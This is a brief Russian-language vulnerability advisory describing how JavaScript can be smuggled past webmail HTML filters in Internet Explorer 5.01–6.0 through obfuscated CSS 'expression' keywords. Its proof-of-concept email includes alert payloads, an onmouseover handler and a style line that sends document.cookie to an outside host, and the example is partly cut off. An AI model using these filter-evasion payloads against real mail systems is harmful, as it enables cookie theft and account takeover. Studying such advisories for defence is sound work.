Программа: Microsoft Internet Explorer 5.01-6.0 в комбинации с Web mail системами 

Уязвимость обнаружена в некоторых Webmail системах в комбинации с Microsoft Internet Explorer. Удаленный атакующий может выполнить произвольный код сценария в почтовом HTML сообщении при его просмотре в Webmail системе, в обход существующих механизмов фильтрации.
Удаленный атакующий может вставить произвольный javascript код в таблицу стилей через ключевое слово «expression» используя определенную методику, чтобы обойти существующие механизмы фильтрации javascript кода в большинстве Webmail системах. Уязвимость работает только в Microsoft Internet Explorer. 

Пример/Эксплоит: 

<!DOCTYPE html PUBLIC «-//W3C//DTD XHTML 1.1//EN»
«http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd»>
<html xmlns=»http://www.w3.org/1999/xhtml» xml:lang=»fr»>
<head>
<title>Webmail test</title>
<meta http-equiv=»Content-Type»
content=»text/html;charset=ISO-8859-1″ />
</head>
<body style=»width:expres\sion(alert(1))»>
<style type=»text/css»>
h1 {
he\ight:e\xpression(alert(2));

bac\kground-image:e\xpression(‘url(http://example.org/’+document.cook
ie+$
}
</style>
<h1 style=»width:expression(alert(3))»>…</h1>
<div id=»just-for-fun»>
<a href=»https://xakep.ru/wp-content/uploads/post/20030/javascript:window.open(document.location);»
onmouseover=»alert(4)»>fireworks</a>
</div>
</body>
</html>



Оставить мнение